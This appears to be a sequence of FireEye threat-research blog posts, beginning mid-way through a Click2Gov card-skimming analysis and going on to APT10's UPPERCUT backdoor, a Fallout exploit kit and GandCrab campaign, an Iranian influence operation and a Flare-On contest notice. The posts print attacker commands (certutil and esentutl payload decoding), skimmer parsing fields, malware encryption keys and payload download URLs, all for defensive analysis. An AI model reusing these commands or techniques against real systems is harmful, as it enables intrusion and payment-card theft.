It is not known how the attacker compromised the Click2Gov webservers, but they likely employed an exploit targeting Oracle Web Logic such as CVE-2017-3248, CVE-2017-3506, or CVE-2017-10271, which would provide the capability to upload arbitrary files or achieve remote access. After exploiting the vulnerability, the attacker uploaded a variant of the publicly available JavaServer Pages (JSP) webshell SJavaWebManage to maintain persistence on the webserver. SJavaWebManage requires authentication to access four specific pages, as depicted in Figure 1, and will execute commands in the context of the Tomcat service, by default the Local System account.


Figure 1: Sample SJavaWebManage interface

  • EnvsInfo: Displays information about the Java runtime, Tomcat version, and other information about the environment.
  • FileManager: Provides the ability to browse, upload, download (original or compressed), edit, delete, and timestomp files.
  • CMDS: Executes a command using cmd.exe (or /bin/sh if on a non-Windows system) and returns the response.
  • DBManage: Interacts with a database by connecting, displaying database metadata, and executing SQL commands.

The differences between the publicly available webshell and this variant include variable names that were changed to possibly inhibit detection, Chinese characters that were changed to English, references to SjavaWebManage that were deleted, and code to handle updates to the webshell being removed. Additionally, the variant identified during the campaign investigation included the ability to manipulate file timestamps on the server. This functionality is not present in the public version. The SJavaWebManage webshell provided the attacker a sufficient interface to easily interact with and manipulate the compromised hosts.

The attacker would then restart a module in DEBUG mode using the SJavaWebManage CMDS page after editing a Click2Gov XML configuration file. With the DEBUG logging option enabled, the Click2Gov module would log plaintext payment card data to the Click2Gov log files with naming convention Click2GovCX.logYYYY-MM-DD.

FIREALARM

Using interactive commands within the webshell, the attacker uploaded and executed a datamining utility FireEye tracks as FIREALARM, which parses through Click2Gov log files to retrieve payment card data, format the data, and print it to the console.

FIREALARM is a command line tool written in C/C++ that accepts three numbers as arguments; Year, Month, and Day, represented in a sample command line as: evil.exe 2018 09 01. From this example, FIREALARM would attempt to open and parse logs starting on 2018-09-01 until the present day. If the log files exists, FIREALARM copies the MAC (Modified, Accessed, Created) times to later timestomp the corresponding file back to original times. Each log file is then read line by line and parsed. FIREALARM searches each line for the following contents and parses the data:

  • medium.accountNumber
  • medium.cvv2
  • medium.expirationDate.year
  • medium.expirationDate.month
  • medium.firstName
  • medium.lastName
  • medium.middleInitial
  • medium.contact.address1
  • medium.contact.address2
  • medium.contact.city
  • medium.contact.state
  • medium.contact.zip.code

This data is formatted and printed to the console. The malware also searches for lines that contain the text ERROR -. If this string is found, the utility stores the contents in a temporary file named %WINDIR%\temp\THN1080.tmp. After searching every line in the Click2GovCX log file, the temporary file THN1080.tmp is copied to replace the respective Click2GovCX log file and the timestamps are replaced to the original, copied timestamps. The result is that FIREALARM prints payment card information to the console and removes the payment card data from each Click2GovCX log file, leaving only the error messages. Finally, the THN1080.tmp temporary file is deleted. This process is depicted in Figure 2.


Figure 2: FIREALARM workflow

  1. Attacker traverses Tor or other proxy and authenticates to SjavaWebManage.
  2. Attacker launches cmd prompt via webshell.
  3. Attacker runs FIREALARM with parameters.
  4. FIREALARM verifies and iterates through log files, copies MAC times, parses and prints payment card data to the console, copies error messages to THN1080.tmp, overwrites the original log file and timestomps with orginal times.
  5. THN1080.tmp is deleted.

SPOTLIGHT

Later, during attacker access to the compromised system, the attacker used the webshell to upload a network sniffer FireEye tracks as SPOTLIGHT. This tool offered the attacker better persistence to the host and continuous collection of payment card data, ensuring the mined data would not be lost if Click2GovCX log files were deleted by an administrator. SPOTLIGHT is also written in C/C++ and may be installed by command line arguments or run as a service.  When run as a service, its tasks include ensuring that two JSP files exist, and monitoring and logging network traffic for specific HTTP POST request contents.

SPOTLIGHT accepts two command line arguments:

  • gplcsvc.exe -i  Creates a new service named gplcsvc with the display name Group Policy Service
  • gplcsvc.exe -u  Stops and deletes the service named gplcsvc

Upon installation, SPOTLIGHT will monitor two paths on the infected host every hour:

  1. C:\bea\c2gdomain\applications\Click2GovCX\scripts\validator.jsp
  2. C:\bea\c2gdomain\applications\ePortalLocalService\axis2-web\RightFrame.jsp

If either file does not exist, the malware Base64 decodes an embedded SJavaWebManage webshell and writes the same file to either path. This is the same webshell installed by the attacker during the initial compromise.

Additionally, SPOTLIGHT starts a socket listener to inspect IPv4 TCP traffic on port 80 and 7101. According to a Superion installation checklist, TCP port 7101 is used for application resolution from the internal network to the Click2Gov webserver. As long as the connection contents do not begin with GET /, the malware begins saving a buffer of received packets. The malware continues saving packet contents to an internal buffer until one of two conditions occurs – the buffer exceeds the size 102399 or the packet contents begin with the string POST /OnePoint/services/OnePointService. If either of these two conditions occur, the internal buffer data is searched for the following tags:

  • <op:AccountNum>
  • <op:CSC>
  • <op:ExpDate>
  • <op:FirstName>
  • <op:LastName>
  • <op:MInitial>
  • <op:Street1>
  • <op:Street2>
  • <op:City>
  • <op:State>
  • <op:PostalCode>

The contents between the tags are extracted and formatted with a `|`, which is used as a separator character. The formatted data is then Base64 encoded and appended to a log file at the hard-coded file path: c:\windows\temp\opt.log. The attacker then used SJavaWebManage to exfiltrate the Base64 encoded log file containing payment card data. FireEye has not identified any manipulation of a compromised host’s SSL configuration settings or redirection of SSL traffic to an unencrypted port. This process is depicted in Figure 3.


Figure 3: SPOTLIGHT workflow

  1. SPOTLIGHT verifies webshell file on an hourly basis, writing SJavaWebManage if missing.
  2. SPOTLIGHT inspects IPv4 TCP traffic on port 80 or 7101, saving a buffer of received packets.
  3. A user accesses Click2Gov module to make a payment.
  4. SPOTLIGHT parses packets for payment card data, Base64 encodes and writes to opt.log.
  5. Attacker traverses Tor or other proxy and authenticates to SJavaWebManage and launches File Manager.
  6. Attacker exfiltrates opt.log file.

Attribution

Based on the available campaign information, the attacker doesn’t align with any financially motivated threat groups currently tracked by FireEye. The attacker’s understanding of the Click2Gov host requirements, process logging details, payment card fields, and internal communications protocols demonstrates an advanced knowledge of the Click2Gov application.  Given the manner in which underground forums and marketplaces function, it is possible that tool development could have been contracted to third parties and remote access to compromised systems could have been achieved by one entity and sold to another. There is much left to be uncovered about this attacker.  

While it is also possible the attack was conducted by a single individual, FireEye assesses, with moderate confidence, that a team was likely involved in this campaign based on the following requisite skillsets:

  • Ability to locate Click2Gov installations and identify exploitable vulnerabilities.
  • Ability to craft or reuse an exploit to penetrate the target organization’s network environment.
  • Basic JSP programming skills.
  • Advanced knowledge of Click2Gov payment processes and software sufficient to develop moderately sophisticated malware.
  • Proficient C/C++ programming skills.
  • General awareness of operational security.
  • Ability to monetize stolen payment card information.

Conclusion

In addition to a regimented patch management program, FireEye recommends that organizations consider implementing a file integrity monitoring solution to monitor the static content and code that generates dynamic content on e-commerce webservers for unexpected modifications.  Another best practice is to ensure any web service accounts run at least privilege.

Although the TTPs observed in the attack lifecycle are generally consistent with other financially motivated attack groups tracked by FireEye, this attacker demonstrated ingenuity in crafting malware exploiting Click2Gov installations, achieving moderate success. Although it may transpire in a new form, FireEye anticipates this threat actor will continue to conduct interactive and financially motivated attacks.

Detection

FireEye’s Adversary Pursuit Team from Technical Operations & Reverse Engineering – Advanced Practices works jointly with Mandiant Consulting and FireEye Labs Advanced Reverse Engineering (FLARE) during investigations assessed as directly supporting a nation-state or financial gains intrusions targeting organizations and involving interactive and focused efforts. The synergy of this relationship allows FireEye to rapidly identify new activity associated with currently tracked threat groups, as well as new threat actors, advanced malware, or TTPs leveraged by threat groups, and quickly mitigate them across the FireEye enterprise.

FireEye detects the malware documented in this blog post as the following:

  • FE_Tool_Win32_FIREALARM_1
  • FE_Trojan_Win64_SPOTLIGHT_1
  • FE_Webshell_JSP_SJavaWebManage_1
  • Webshell.JSP.SJavaWebManage

Indicators of Compromise (MD5)

SJavaWebManage

  • 91eaca79943c972cb2ca7ee0e462922c          
  • 80f8a487314a9573ab7f9cb232ab1642         
  • cc155b8cd261a6ed33f264e710ce300e           (Publicly available version)

FIREALARM

  • e2c2d8bad36ac3e446797c485ce8b394

SPOTLIGHT

  • d70068de37d39a7a01699c99cdb7fa2b
  • 1300d1f87b73d953e20e25fdf8373c85
  • 3bca4c659138e769157f49942824b61f

APT10 Targeting Japanese Corporations Using Updated TTPs

Introduction

In July 2018, FireEye devices detected and blocked what appears to be APT10 (Menupass) activity targeting the Japanese media sector. APT10 is a Chinese cyber espionage group that FireEye has tracked since 2009, and they have a history of targeting Japanese entities.

In this campaign, the group sent spear phishing emails containing malicious documents that led to the installation of the UPPERCUT backdoor. This backdoor is well-known in the security community as ANEL, and it used to come in beta or RC (release candidate) until recently. Part of this blog post will discuss the updates and differences we have observed across multiple versions of this backdoor.

Attack Overview

The attack starts with Microsoft Word documents containing a malicious VBA macro being attached to spear phishing emails. Although the contents of the malicious documents are unreadable (see Figure 3), the Japanese titles are related to maritime, diplomatic, and North Korean issues. Table 1 shows the UPPERCUT indicators of compromise (IoCs).

File Name

MD5

Size

C2

自民党海洋総合戦略小委員会が政府に提言申し入れ.doc

Government Recommendations from the Liberal Democratic Party’s Comprehensive Strategic Maritime Subcommittee

4f83c01e8f7507d23c67ab085bf79e97

843022

eservake.jetos[.]com

82.221.100.52

151.106.53.147

グテマラ大使講演会案内状.doc

Invitation to Lecture by Guatemalan Ambassador

f188936d2c8423cf064d6b8160769f21

720384

 

eservake.jetos[.]com

151.106.53.147

153.92.210.208 

米国接近に揺れる北朝鮮内部.doc

North Korean interior swayed by the approach of the United States

cca227f70a64e1e7fcf5bccdc6cc25dd

733184

eservake.jetos[.]com

153.92.210.208

167.99.121.203

Table 1: UPPERCUT IoCs

For the North Korean lure, a news article with an identical title was readily available online. It’s also worth noting that in the Guatemalan lure, the attacker used an unusual spelling of Guatemala in Japanese. The top result of a Google search using the same spelling led us to the event website for the lecture of the Guatemalan Ambassador, held in August 2018. Figure 1 shows the screenshot of the event page.


Figure 1: Event Website for the Lecture of Guatemala Ambassador

Figure 2 shows the macro function that displays the lure document. At the bottom of this function, we can see the readable text that matches the contact information found in Figure 1. Thus, people who would have an interest in Latin American issues may have been the targets of this campaign.


Figure 2: Macro to display lure document

The initial Word documents were password protected, likely in an effort to bypass detection. Once the password (delivered in the body of the email) is entered, the users are presented with a document that will request users to enable the malicious macro, as shown in Figure 3.


Figure 3: Lure document

Figure 4 shows what happens when the malicious macro is executed.


Figure 4: Macro to install UPPERCUT

The execution workflow is as follows:

1.     The macro drops three PEM files, padre1.txt, padre2.txt, and padre3.txt, to the victim’s %TEMP% folder and then copies them from %TEMP% to the %AllUserProfile% folder.

2.     The macro decodes the dropped files using Windows certutil.exe with the following commands (certutil.exe is a legitimate built-in command-line program to manage certificates in Windows):

C:\Windows\System32\cmd.exe" /c certutil -decode C:\ProgramData\padre1.txt C:\ProgramData\\GUP.txt

C:\Windows\System32\cmd.exe" /c certutil -decode C:\ProgramData\padre2.txt C:\ProgramData\\libcurl.txt

C:\Windows\System32\cmd.exe" /c certutil -decode C:\ProgramData\padre3.txt C:\ProgramData\\3F2E3AB9

3.     The macro creates a copy of the files with their proper extensions using Extensible Storage Engine Utilities (esentutil.exe) with the following commands (esentutil.exe is also a legitimate program that is pre-installed in Windows):

C:\Windows\System32\esentutl.exe" /y C:\ProgramData\\GUP.txt /d C:\ProgramData\GUP.exe /o

C:\Windows\System32\esentutl.exe" /y C:\ProgramData\\libcurl.txt /d C:\ProgramData\libcurl.dll /o

The dropped files include the following:

  • GUP.exe : GUP, a free (LGPL) Generic Updater. GUP is an open source binary used by Notepad++ for software updates. The version used here is version 4.1 digitally signed by Notepad++, as shown in Figure 5.
  • libcurl.dll: Malicious Loader DLL
  • 3F2E3AB9: Encrypted shellcode


Figure 5: Notepad++ signed updater

4.     The macro launches the legitimate executable GUP.exe.

  • The executable sideloads the malicious DLL (libcurl.dll), which decrypts and runs shellcode (3F2E3AB9) located in the same folder.
  • The shellcode decodes and decompresses another DLL, which is an updated variant of UPPERCUT. Before decoding the DLL, the shellcode uses an anti-debug technique based on ntdll_NtSetInformationThread which causes the thread to be detached from the debugger, as shown in Figure 6. The DLL is then loaded into memory and the randomly named exported function is called.


Figure 6: Anti-debug technique used by shellcode

5.     The macro deletes the initially dropped .txt files using Windows esentutl.exe and changes the document text to an embedded message.

The complete attack overview is shown in Figure 7.


Figure 7: Attack overview

Several threat actors leverage the technique of using Windows certutil.exe for payload decoding, and APT10 continues to employ this technique.

Evolution of UPPERCUT

Figure 8 shows the timeline of updates for UPPERCUT. The PE compile time of loaders and the create time of droppers (Word documents) are plotted in the graph. The compile time of loaders in the newer version(s) are not shown here since the timestamps are overwritten and filled with zeroes. We don’t have visibility into UPPERCUT 5.2.x series, but it’s possible that minor revisions were released every few months between December 2017 and May 2018.


Figure 8: Timeline of UPPERCUT updates

Unlike previous versions, the exported function names are randomized in the latest version (Table 2).

Encoded Payload

Decoded Payload

MD5

Size

Import Hash

Exported Function

Version

aa3f303c3319b14b4829fe2faa5999c1

322164

182ee99b4f0803628c30411b1faa9992

l7MF25T96n45qOGWX

5.3.2

126067d634d94c45084cbe1d9873d895

330804

5f45532f947501cf024d84c36e3a19a1

hJvTJcdAU3mNkuvGGq7L

5.4.1

fce54b4886cac5c61eda1e7605483ca3

345812

c1942a0ca397b627019dace26eca78d8

WcuH

5.4.1

Table 2: Static characteristics of UPPERCUT

Another new feature in the latest UPPERCUT sample is that the malware sends an error code in the Cookie header if it fails to receive the HTTP response from the command and control (C2) server. The error code is the value returned by the GetLastError function and sent in the next beacon. This was likely included to help the attackers understand the problem if the backdoor is unable to receive a response (Figure 9). This Cookie header is a unique indicator that can be used for network-based detection.


Figure 9: Example of callback

Earlier versions of UPPERCUT used the hard-coded string “this is the encrypt key” for Blowfish encryption when communicating with a C2. However, in the latest version, the keys are hard-coded uniquely for each C2 address and use the C2’s calculated MD5 hash to determine which key to use, as shown in Figure 10.


Figure 10: Blowfish key generation

For instance, Table 3 lists the hard-coded C2 addresses, their MD5 hash, and the corresponding Blowfish key in the decoded payload of 126067d634d94c45084cbe1d9873d895.

C2

MD5

Blowfish Key

hxxp[:]//151.106.53[.]147/VxQG

f613846eb5bed227ec1a5f8df7e678d0

bdc4b9f5af9868e028dd0adc10099a4e6656e9f0ad12b2e75a30f5ca0e34489d

hxxp[:]//153.92.210[.]208/wBNh1

50c60f37922ff2ff8733aaeaa9802da5

fb9f7fb3c709373523ff27824ed6a31d800e275ec5217d8a11024a3dffb577dd

hxxp[:]//eservake.jetos[.]com/qIDj

c500dae1ca41236830b59f1467ee96c1

d3450966ceb2eba93282aace7d7684380d87c6621bbd3c4f621caa079356004a

Default

 Default

f12df6984bb65d18e2561bd017df29ee1cf946efa5e510802005aeee9035dd53

Table 3: Example of Blowfish keys

In this example, the MD5 hash of hxxp[:]//151.106.53[.]147/VxQG will be f613846eb5bed227ec1a5f8df7e678d0. When the malware interacts with this URL, bdc4b9f5af9868e028dd0adc10099a4e6656e9f0ad12b2e75a30f5ca0e34489d will be selected as a Blowfish key. If the MD5 hash of the URL does not match any of the listed hashes, then the default key f12df6984bb65d18e2561bd017df29ee1cf946efa5e510802005aeee9035dd53 will be used.

Another difference in the network traffic generated from the malware is that the encoded proxy information has been added in the URL query values during the C2 communication. Table 4 shows the parameters sent to C2 server from the backdoor in the newer versions. These are sent via POST request, as shown in Figure 9.


Table 4: URL parameters

Additionally, the command string is hashed using the same RGPH hashing algorithm as before. Two more commands, 0xD290626C85FB1CE3 and 0x409C7A89CFF0A727, are supported in the newer versions (Table 5).

Commands

Description

0x97A168D9697D40DD

Download and validate file (XXHash comparison) from C2 server

0x7CF812296CCC68D5

Upload file to C2 server

0x652CB1CEFF1C0A00

Load PE file

0x27595F1F74B55278

Download, validate (XXHash comparison), execute file, and send output to C2 server

0xD290626C85FB1CE3

Format the current timestamp

0x409C7A89CFF0A727

Capture the desktop screenshot in PNG format and send it to C2

None of the above

The received buffer is executed via cmd.exe and the output is then sent to the C2 server

Table 5: Supported commands

Conclusion

While APT10 consistently targets the same geolocation and industry, the malware they use is actively evolving. In the newer versions of UPPERCUT, there is a significant change in the way backdoor initializes the Blowfish encryption key, which makes it harder for analysts to detect and decrypt the backdoor’s network communications. This shows that APT10 is very capable of maintaining and updating their malware.

To mitigate the threat, users are advised to disable Office macros in their settings and not to open documents from unknown sources. FireEye Multi-Vector Execution (MVX) engine is able to recognize and block this threat with the following detection names:

  • APT.Backdoor.Win.UPPERCUT
  • FE_APT_Backdoor_Win32_UPPERCUT

Fallout Exploit Kit Used in Malvertising Campaign to Deliver GandCrab Ransomware

Towards the end of August 2018, FireEye identified a new exploit kit (EK) that was being served up as part of a malvertising campaign affecting users in Japan, Korea, the Middle East, Southern Europe, and other countries in the Asia Pacific region.

The first instance of the campaign was observed on Aug. 24, 2018, on the domain finalcountdown[.]gq. Tokyo-based researchers “nao_sec” identified an instance of this campaign on Aug. 29, and in their own blog post they refer to the exploit kit as Fallout Exploit Kit. As part of our research, we observed additional domains, regions, and payloads associated with the campaign. Other than SmokeLoader being distributed in Japan, which is mentioned in the nao_sec blog post, we observed GandCrab ransomware being distributed in the Middle East, which we will be focusing on in this blog post.

Fallout EK fingerprints the user browser profile and delivers malicious content if the user profile matches a target of interest. If successfully matched, the user is redirected from a genuine advertiser page, via multiple 302 redirects, to the exploit kit landing page URL. The complete chain from legit domain, cushion domains, and then to the exploit kit landing page is shown in Figure 1.


Figure 1: Malvertisement redirection to Fallout Exploit Kit landing page

The main ad page prefetches cushion domain links while loading the ad and uses the <noscript> tag to load separate links in cases where JavaScript is disabled in a browser (Figure 2).


Figure 2: Content in the first ad page

In regions not mentioned earlier in this blog post, the ‘link rel="dns-prefetch" href”’ tag has a different value and the ad does not lead to the exploit kit. The complete chain of redirection via 302 hops is shown in Figure 3, 4 and 5


Figure 3: 302 redirect to exploit kit controlled cushion servers


Figure 4: Another redirection before exploit kit landing page


Figure 5: Last redirect before user reaches exploit kit landing page

URIs for the landing page keep changing and are too generic for a pattern, making it harder for IDS solutions that rely on detections based on particular patterns.

Depending on browser/OS profiles and the location of the user, the malvertisement either delivers the exploit kit or tries to reroute the user to other social engineering campaigns. For example, in the U.S. on a fully patched macOS system, malvertising redirects users to social engineering attempts similar to those shown in Figure 6 and Figure 7.


Figure 6: Fake AV prompt for Mac users


Figure 7: Fake Flash download prompt

The strategy is consistent with the rise of social engineering attempts FireEye has been observing for some time, where bad actors use them to target users that are on fully patched systems or any OS/software profile that is not ideal for any exploit attempts due to software vulnerability. The malvertisement redirect involved in the campaign has been abused heavily in many social engineering campaigns in North America as well.

FireEye Dynamic Threat Intelligence (DTI) shows that this campaign has triggered alerts from customers in the government, telecom and healthcare sectors.

Landing Page

Initially, the landing page only contained code for a VBScript vulnerability (CVE-2018-8174). However, Flash embedding code was later added for more reliable execution of the payload.

The landing page keeps the VBScript code as Base64 encoded text in the ‘<span>’ tag. It loads a JScript function when the page loads, which decodes the next stage VBScript code and executes it using the VBScript ExecuteGlobal function (Figure 8).


Figure 8: Snippet of landing page

Figure 9 shows the JScript function that decodes the malicious VBScript code.


Figure 9: Base64 decode function

Flash embedding code is inside the ‘noscript’ tag and loads only when scripts are disabled (Figure 10).


Figure 10: Flash embedding code

The decoded VBScript code exploits the CVE-2018-8174 vulnerability and executes shellcode (Figure 11).


Figure 11: Decoded VBScript

 The shellcode downloads a XOR’d payload at %temp% location, decrypts it, and executes it (Figure 12).


Figure 12: XOR binary transfer that decrypts to 4072690b935cdbfd5c457f26f028a49c

Payload Analysis (4072690b935cdbfd5c457f26f028a49c)

The malware contains PE loader code that is used for initial loading and final payload execution (Figure 13).


Figure 13: Imports resolver from the PE loader

The unpacked DLL 83439fb10d4f9e18ea7d1ebb4009bdf7 starts by initializing a structure of function pointers to the malware's core functionality (Figure 14).


Figure 14: Core structure populated with function pointers

It then enumerates all running processes, creates their crc32 checksums, and tries to match them against a list of blacklisted checksums. The list of checksums and their corresponding process names are listed in Table 1.

CRC32 Checksum

Process Name

99DD4432h

vmwareuser.exe

2D859DB4h

vmwareservice.exe

64340DCEh

vboxservice.exe

63C54474h

vboxtray.exe

349C9C8Bh

Sandboxiedcomlaunch.exe

5BA9B1FEh

procmon.exe

3CE2BEF3h

regmon.exe

3D46F02Bh

filemon.exe

77AE10F7h

wireshark.exe

0F344E95Dh

netmon.exe

278CDF58h

vmtoolsd.exe

Table 1: Blacklisted checksums

If any process checksums match, the malware goes into an infinite loop, effectively becoming benign from this point onward (Figure 15).


Figure 15: Blacklisted CRC32 check

If this check passes, a new thread is started in which the malware first acquires "SeShutdownPrivilege" and checks its own image path, OS version, and architecture (x86/x64). For OS version 6.3 (Windows 8.1/Windows Server 2012), the following steps are taken:

  • Acquire "SeTakeOwnershipPrivilege", and take ownership of "C:\Windows\System32\ctfmon.exe"
  • If running under WoW64, disable WoW64 redirection via Wow64DisableWow64FsRedirection to be able to replace 64-bit binary
  • Replace "C:\Windows\System32\ctfmon.exe" with a copy of itself
  • Check whether "ctfmon.exe" is already running. If not, add itself to startup through the registry key "\Registry\Machine\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
  • Call ExitWindowsEx to reboot the system

In other OS versions, the following steps are taken:

  • Acquire "SeTakeOwnershipPrivilege", and take ownership of "C:\Windows\System32\rundll32.exe"
  • If running under WoW64, disable WoW64 redirection via Wow64DisableWow64FsRedirection to be able to replace 64-bit binary
  • Replace "C:\Windows\System32\rundll32.exe" with a copy of itself
  • Add itself to startup through the registry key "\Registry\Machine\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
  • Call ExitWindowsEx to reboot the system

In either case, if the malware fails to replace system files successfully, it will copy itself at the locations listed in Table 2, and executes via ShellExecuteW.

Dump Path

Dump Name

%APPDATA%\Microsoft

{random alphabets}.exe

%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup

{random alphabets}.pif

Table 2: Alternate dump paths

On execution the malware checks if it is running as ctfmon.exe/rundll32 or as an executable in Table 2. If this check passes, the downloader branch starts executing (Figure 16).


Figure 16: Downloader code execution after image path checks

A mutex "Alphabeam ldr" is created to prevent multiple executions. Here payload URL decoding happens. Encoded data is copied to a blob via mov operations (Figure 17).


Figure 17: Encoded URL being copied

A 32-byte multi-XOR key is set up with the algorithm shown in Figure 18.


Figure 18: XOR key generation

XOR Key (83439fb10d4f9e18ea7d1ebb4009bdf7)

{ 0x25, 0x24, 0x60, 0x67, 0x00, 0x20, 0x23, 0x65, 0x6c, 0x00, 0x2f, 0x2e, 0x6e, 0x69, 0x00, 0x2a, 0x35, 0x73, 0x76, 0x00, 0x31, 0x30, 0x74, 0x73, 0x00, 0x3c, 0x3f, 0x79, 0x78, 0x00, 0x3b, 0x3a }

Finally, the actual decoding is done using PXOR with XMM registers (Figure 19).


Figure 19: Payload URL XOR decoding

This leads the way for the downloader switch loop to execute (Figure 20).


Figure 20: Response/Download handler

Table 3 shows a breakdown of HTTP requests, their expected responses (where body = HTTP response body), and corresponding actions.

Request #

Request URL

(Expected Response) body+0x0

body+0x4

body+0x7

Action

1

hxxp://91[.]210.104.247/update.bin

0x666555

0x0

url for request #2

Download payload via request #2, verify MZ and PE header, execute via CreateProcessW

1

hxxp://91[.]210.104.247/update.bin

0x666555

0x1

N/A

Supposed to be executing already downloaded payload via CreateProcess. However, the functionality has been shortcircuited; instead, it does nothing and continues loop after sleep

1

hxxp://91[.]210.104.247/update.bin

0x666555

0x2

url for request #2

Download payload via request #2, verify MZ and PE header, load it manually in native process space using its PE loader module

1

hxxp://91[.]210.104.247/update.bin

0x666555

0x3

N/A

Supposed to be executing already downloaded payload via its PE loader. However, the functionality has been shortcircuited; instead, it does nothing and continues loop after sleep

1

hxxp://91[.]210.104.247/update.bin

0x666555

0x4

url for request #3

Perform request #3

1

hxxp://91[.]210.104.247/update.bin

N/A

N/A

N/A

Sleep for 10 minutes and continue from request #1

2

from response #1

PE payload

N/A

N/A

Execute via CreateProcessW or internal PE loader, depending on previous response

3

from response #1

N/A

N/A

N/A

No action taken. Sleep for 10 minutes and start with request #1

Table 3: HTTP requests, responses, and actions

The request sequence leads to GandCrab ransomware being fetched and manually loaded into memory by the malware. Figure 21 and Figure 22 show sample request #1 and request #2 respectively, leading to the download and execution of GandCrab (8dbaf2fda5d19bab0d7c1866e0664035).


Figure 21: Request #1 fetching initial command sequence from payload URL


Figure 22: Request #2 downloads GandCrab ransomware that gets manually loaded into memory

Conclusion

In recent years, arrests and distruptions of underground operations have led to exploit kit activity declining heavily. Still, exploit kits pose a significant threat to users who are not running fully patched systems. Nowadays we see more exploit kit activity in the Asia Pacific region, where users tend to have more vulnerable software. Meanwhile, in North America, the focus tends to be on more straightforward social engineering campaigns.

FireEye Network Security detects all exploits, social engineering campaigns, malware, and command and control communication mentioned in this post. MVX technology used in multiple FireEye products detects the first stage and second stage malware described in this post.

Indicators of Compromise

Domain / IP / Address / Filename

MD5 Hash Or Description

finalcountdown.gq, naosecgomosec.gq,

ladcbteihg.gq, dontneedcoffee.gq

Exploit kit domains

78.46.142.44, 185.243.112.198

Exploit kit IPs

47B5.tmp

4072690b935cdbfd5c457f26f028a49c

hxxp://46.101.205.251/wt/ww.php

 

hxxp://107.170.215.53/workt/trkmix.php?device=desktop&country=AT&connection.type=BROADBAND&clickid=58736927880257537&countryname=
Austria&browser=ie&browserversion=11&carrier=%3F&cost=0.0004922&isp=BAXALTA+INCORPORATED+ASN&os=windows&osversion=6.1&useragent=
Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%3B+Trident%2F7.0%3B+rv%3A11.0%29+like+Gecko&campaignid=1326906&language=de&zoneid=1628971

 

Redirect URL examples used between malvertisement and exploit kit controlled domains

91.210.104[.]247/update.bin

Second stage payload download URL

91.210.104[.]247/not_a_virus.dll

8dbaf2fda5d19bab0d7c1866e0664035

 

Second stage payload (GandCrab ransomware)

Acknowledgements

We would like to thank Hassan Faizan for his contributions to this blog post.

Suspected Iranian Influence Operation Leverages Network of Inauthentic News Sites & Social Media Targeting Audiences in U.S., UK, Latin America, Middle East

FireEye has identified a suspected influence operation that appears to originate from Iran aimed at audiences in the U.S., U.K., Latin America, and the Middle East. This operation is leveraging a network of inauthentic news sites and clusters of associated accounts across multiple social media platforms to promote political narratives in line with Iranian interests. These narratives include anti-Saudi, anti-Israeli, and pro-Palestinian themes, as well as support for specific U.S. policies favorable to Iran, such as the U.S.-Iran nuclear deal (JCPOA). The activity we have uncovered is significant, and demonstrates that actors beyond Russia continue to engage in and experiment with online, social media-driven influence operations to shape political discourse.

What Is This Activity?

Figure 1 maps the registration and content promotion connections between the various inauthentic news sites and social media account clusters we have identified thus far. This activity dates back to at least 2017. At the time of publication of this blog post, we continue to investigate and identify additional social media accounts and websites linked to this activity. For example, we have identified multiple Arabic-language, Middle East-focused sites that appear to be part of this broader operation that we do not address here.


Figure 1: Connections among components of suspected Iranian influence operation

We use the term “inauthentic” to describe sites that are not transparent in their origins and affiliations, undertake concerted efforts to mask these origins, and often use false social media personas to promote their content. The content published on the various websites consists of a mix of both original content and news articles appropriated, and sometimes altered, from other sources.

Who Is Conducting this Activity and Why?

Based on an investigation by FireEye Intelligence’s Information Operations analysis team, we assess with moderate confidence that this activity originates from Iranian actors. This assessment is based on a combination of indicators, including site registration data and the linking of social media accounts to Iranian phone numbers, as well as the promotion of content consistent with Iranian political interests. For example:

  • Registrant emails for the sites ‘Liberty Front Press’ and ‘Instituto Manquehue’ are associated with advertisements for website designers in Tehran and with the Iran-based site gahvare[.]com, respectively.
  • We have identified multiple Twitter accounts directly affiliated with the sites, as well as other associated Twitter accounts, that are linked to phone numbers with the +98 Iranian country code.
  • We have observed inauthentic social media personas, masquerading as American liberals supportive of U.S. Senator Bernie Sanders, heavily promoting Quds Day, a holiday established by Iran in 1979 to express support for Palestinians and opposition to Israel.

We limit our assessment regarding Iranian origins to moderate confidence because influence operations, by their very nature, are intended to deceive by mimicking legitimate online activity as closely as possible. While highly unlikely given the evidence we have identified, some possibility nonetheless remains that the activity could originate from elsewhere, was designed for alternative purposes, or includes some small percentage of authentic online behavior. We do not currently possess additional visibility into the specific actors, organizations, or entities behind this activity. Although the Iran-linked APT35 (Newscaster) has previously used inauthentic news sites and social media accounts to facilitate espionage, we have not observed any links to APT35.

Broadly speaking, the intent behind this activity appears to be to promote Iranian political interests, including anti-Saudi, anti-Israeli, and pro-Palestinian themes, as well as to promote support for specific U.S. policies favorable to Iran, such as the U.S.-Iran nuclear deal (JCPOA). In the context of the U.S.-focused activity, this also includes significant anti-Trump messaging and the alignment of social media personas with an American liberal identity. However, it is important to note that the activity does not appear to have been specifically designed to influence the 2018 U.S. midterm elections, as it extends well beyond U.S. audiences and U.S. politics.

Conclusion

The activity we have uncovered highlights that multiple actors continue to engage in and experiment with online, social media-driven influence operations as a means of shaping political discourse. These operations extend well beyond those conducted by Russia, which has often been the focus of research into information operations over recent years. Our investigation also illustrates how the threat posed by such influence operations continues to evolve, and how similar influence tactics can be deployed irrespective of the particular political or ideological goals being pursued.

Additional Details

The full report is available for download via the link of the top right of the page.

Announcing the Fifth Annual Flare-On Challenge

The FireEye Labs Advanced Reverse Engineering (FLARE) team’s annual reverse engineering challenge will start at 8:00 p.m. ET on Aug. 24, 2018. This is a CTF-style challenge for all active and aspiring reverse engineers, malware analysts, and security professionals. So dust off your disassembler, put a new coat of oil on your old debugger, and get your favorite chat client ready to futilely beg your friends for help. Once again, this contest is designed for individuals, not teams, and it is a single track of challenges. The contest runs for six full weeks and ends at 8:00 p.m. ET on Oct. 5, 2018.

This year’s contest will once again host a total of 12 challenges covering architectures from x86, x64 on Windows, Java, .NET, Webassembly, and Linux, with special appearances of Bootloaders and Bootkits. This is one of the only Windows-centric CTF challenges out there and we have crafted it to represent the skills and challenges of our workload on the FLARE team.

If you complete the Flare-On Challenge you will receive a prize and permanent recognition on the flare-on.com website for your accomplishment. Prize details will be revealed when the contest ends, but as always, it will be something that will be coveted and envied by your peers. In prior years we’ve had rodeo belt buckles, replica police badges, challenge coins, and a huge pin.

